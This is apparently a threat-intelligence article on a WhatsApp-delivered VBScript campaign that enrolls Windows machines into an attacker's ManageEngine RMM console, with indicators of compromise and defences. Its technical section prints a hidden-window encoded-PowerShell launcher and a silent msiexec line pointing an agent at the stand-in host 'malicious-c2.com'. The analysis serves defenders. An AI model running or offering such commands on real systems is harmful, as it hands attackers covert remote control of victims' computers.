Security researchers have uncovered an active malware campaign that hijacks legitimate WhatsApp accounts to deliver malicious VBScript files, ultimately enrolling victim machines into a ManageEngine remote monitoring and management (RMM) infrastructure. The attack, observed in June 2025, targets users in at least six countries—Malaysia, Brazil, India, Mexico, Singapore, and the United States—and gives threat actors persistent, stealthy access to Windows systems for data theft, lateral movement, or ransomware deployment.

Unlike traditional phishing campaigns that rely on email, this operation weaponizes the trust inherent in instant messaging. A compromised WhatsApp account sends a VBScript attachment disguised as a routine document, invoice, or notification. Because the message appears to come from a known contact, recipients are far more likely to run the script without suspicion. Once executed, the VBScript triggers a chain of commands that quietly downloads and installs a legitimate ManageEngine RMM agent, configuring it to phone home to attacker-controlled servers.

How the Attack Chain Unfolds

The initial infection vector is a .vbs file attached to a WhatsApp message. VBScript, a scripting language tightly integrated with Windows Script Host, remains a potent tool for automation—and for malware authors. Despite being deprecated in Internet Explorer and largely replaced by PowerShell in modern attack chains, VBScript still executes natively on all supported Windows editions, often bypassing browser-based security filters. In this campaign, the script uses native Windows utilities like mshta, wscript, or bitsadmin to retrieve a second-stage payload from a remote command-and-control (C2) server.

That second stage is a silent installer for ManageEngine Desktop Central or Endpoint Central—legitimate enterprise software used by IT teams worldwide. The installer is configured during execution to register the newly deployed agent with a rogue management server operated by the attackers. As a result, the victim’s PC becomes a managed endpoint in the criminal’s own RMM console, granting capabilities such as:

  • Remote desktop access and screen capture
  • File transfer and execution of arbitrary commands
  • System information gathering (hardware, software, network)
  • Deployment of additional malware or scripts
  • Full persistence through the RMM agent’s built-in service

Because ManagedEngine RMM software is signed by Zoho Corp and digitally trusted by antivirus engines, the agent raises few alarms. This “living-off-the-land” approach allows attackers to blend into normal IT operations, evading detection for extended periods.

A Truly International Threat

The campaign’s geographic fingerprint is broad. According to telemetry shared by researchers, the following countries have been actively targeted:

Country Targeted Sector/Users
Malaysia Small businesses, government contractors
Brazil Healthcare, education, individual consumers
India IT services, outsourced customer support
Mexico Manufacturing, logistics
Singapore Financial services, law firms
United States Enterprise users, critical infrastructure

Malaysian victims appear to bear the brunt of the attack, with a high volume of compromised WhatsApp accounts used to spread the lure. In Brazil and India, the malware has been observed alongside follow-on banking trojans, suggesting a monetization focus. In the U.S. and Singapore, initial intrusions have been linked to reconnaissance activity indicative of future ransomware or data exfiltration operations.

Why Abusing RMM Tools Is on the Rise

RMM abuse is not new—threat actors have long co-opted tools like AnyDesk, TeamViewer, and ScreenConnect. However, targeting ManageEngine specifically is a calculated choice. Its agents are enterprise-grade, support complex orchestration (patch management, software deployment, remote PowerShell), and generate legitimate-looking traffic to well-known domains. Security teams may overlook agent-related logs amid the noise of corporate IT activity.

This campaign also highlights a disturbing trend: the commoditization of RMM-based attack frameworks. Underground forums now sell ready-made “RMM implant” kits that allow even low-skilled criminals to set up their own malicious management servers. Combined with low-cost access to compromised WhatsApp accounts, the barrier to entry has never been lower.

The WhatsApp Vector: Trust Turned Toxic

WhatsApp’s end-to-end encryption and private messaging model make it a fertile ground for social engineering. Attackers either take over existing accounts through SIM swapping or credential theft, or they create duplicate profiles using publicly available photos. Once in control, they message the victim’s contacts with a convincing pretext—“Please review this invoice,” “Your report is attached,” or “I need your approval on this.” The attachment, typically named something like Invoice_2343.vbs, appears as a document on mobile devices but executes immediately on Windows when double-clicked.

Even the file extension can be masked. Windows File Explorer often hides extensions by default, so a file named Invoice_2343.vbs might show only as Invoice_2343 with a script icon. Coupled with the trustworthiness of the sender, the success rate of these lures is alarmingly high.

Technical Deep Dive: From VBScript to RMM

Stage 1: The VBScript Payload

A typical VBScript in this campaign is heavily obfuscated. It starts by calling WScript.Shell to run a hidden window, then concatenates strings to build a PowerShell command. The script may use StrReverse() and Chr() functions to avoid static signatures. For example:

Dim objShell
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -WindowStyle Hidden -EncodedCommand [Base64String]", 0

The encoded PowerShell downloads a second VBScript or an EXE installer from a C2 domain. Because the PowerShell process is spawned by WScript, it inherits a hidden window and runs silently.

Stage 2: Retrieving the ManageEngine Installer

The downloaded installer is a legitimate MSI or EXE file signed by Zoho Corp. The script invokes msiexec /i or runs the executable with parameters that specify the C2 server address, group name, and activation key. For instance:

msiexec /i ManageEngine_Agent.msi /qn SERVER=malicious-c2.com:8443 GROUP=default KEY=attackerkEy123

The /qn flag ensures a fully silent installation. Once installed, the agent service starts, establishes an outbound connection to the attacker’s server, and appears in the criminal’s management console.

Stage 3: Establishing Persistence and Control

The agent registers itself as a Windows service, often named “ManageEngine Desktop Central Agent,” and adds startup entries. It also opens a persistent HTTPS connection, enabling the attacker to send commands at any time. Because the traffic is encrypted and uses standard ports, network-based detection is difficult without deep packet inspection of TLS handshakes.

Indicators of Compromise (IOCs)

While the campaign uses rotating C2 domains, some common IOCs include:

  • Presence of an unexpected ManageEngine agent service (check services.msc)
  • Scheduled tasks named “DCAgentUpdater” or similar
  • Outbound connections to unfamiliar IPs on port 8443 or 443
  • New firewall exceptions for the agent process
  • VBScript files in %TEMP% or download folders with random numeric names

Organizations using ManageEngine legitimately should verify that all agents are registered to their authorized management servers. Any rogue agents should be immediately uninstalled and investigated.

Attackers’ Endgame: What Happens After the RMM Agent Is Deployed

Once the attacker gains interactive remote access, the possibilities are vast. Based on similar RMM-based campaigns, the post-intrusion activity typically includes:

  1. Credential Harvesting: The agent can run Mimikatz or similar tools to extract cached passwords, Kerberos tickets, and browser-stored credentials.
  2. Lateral Movement: With stolen credentials, the attacker pivots to other systems via RDP, PsExec, or WMI.
  3. Data Exfiltration: Sensitive files are zipped and transferred through the agent’s secure channel or via cloud storage (Dropbox, Mega).
  4. Ransomware Deployment: The final payload may be a ransomware binary pushed through the RMM’s software deployment module.
  5. Persistence Beyond the Agent: Attackers often install secondary backdoors separate from the RMM tool to maintain access even if the agent is removed.

In some cases, the compromised RMM agent itself is used to deploy additional malware to hundreds of endpoints in a single command, effectively weaponizing the victim’s own IT management infrastructure.

Defensive Strategies: Mitigating VBScript and RMM Threats

For Individual Users

  • Disable Windows Script Host if not needed. This can be done via Group Policy or by simply setting the .vbs file association to Notepad. On modern Windows 11 installations, if WSH is not actively used, consider removing it entirely.
  • Never open attachments from unknown or even known contacts without verification. Contact the sender through a different channel if an attachment seems out of the ordinary.
  • Enable file extension visibility in File Explorer to easily spot .vbs files.
  • Use a reputable security solution that includes behavioral detection for script-based attacks.
  • Consider using WhatsApp’s built-in preview feature – legitimate documents like PDFs will preview, while script files will not, potentially raising suspicion.

For Businesses and IT Administrators

  • Deploy application whitelisting (e.g., AppLocker or Windows Defender Application Control) to block WScript and CScript execution in user-writable directories.
  • Monitor for unsanctioned RMM installations. Endpoint detection and response (EDR) tools can flag the installation of new services or modules associated with ManageEngine or other RMM suites.
  • Enable attack surface reduction (ASR) rules in Microsoft Defender, specifically the rule “Block executable files from running unless they meet a prevalence, age, or trusted list criterion.”
  • Educate employees about the evolving threat of WhatsApp and instant-messaging malware, not just email phishing.
  • Audit your own RMM deployments regularly. Ensure that every agent corresponds to an authorized server and that auto-enrollment features are restricted to known networks.
  • Implement network segmentation so that if an endpoint is compromised via WhatsApp, the attacker cannot immediately reach critical servers.

What WhatsApp Can Do

Meta could implement additional attachment scanning at the point of upload, blocking or flagging executable file types. While WhatsApp already warns about “suspicious links,” similar heuristics could apply to attachments with double extensions or known script extensions. Encouraging users to report malicious accounts would also help deter account takeovers.

The Bigger Picture: Instant Messaging as an Attack Surface

Instant messaging platforms have become an irresistible target for cybercriminals. WhatsApp’s two-billion-strong user base means a well-crafted message can reach more potential victims than a typical email spam campaign. Moreover, because people use WhatsApp for both personal and professional communication, the boundaries blur—employees may receive a work-related lure on their personal devices, leading to an infection that later spreads to corporate networks.

This campaign underscores the need for security awareness that stretches beyond the email inbox. Employees should be trained to treat attachments from colleagues and business partners with the same scrutiny regardless of the delivery medium. As RMM-based attacks grow more common, the security community must shift its focus to detecting unauthorized management tools as critical IOCs, not just the presence of known malware binaries.

What Comes Next?

Intelligence suggests that the threat actors behind this campaign are refining their tooling—moving from VBScript to PowerShell and incorporating more advanced obfuscation to evade Microsoft’s Antimalware Scan Interface (AMSI). There are early indicators that a variant of the attack is being tested on other instant messengers, including Telegram and Signal, using their file-sharing capabilities.

Microsoft is reportedly considering further restrictions on VBScript execution in consumer versions of Windows, possibly mirroring its complete removal from the default Windows installation by 2027. Until then, defensive measures must focus on the human element and on monitoring for—and blocking—unwanted RMM agent deployments. The line between a helpful IT tool and a malicious remote access trojan has never been thinner.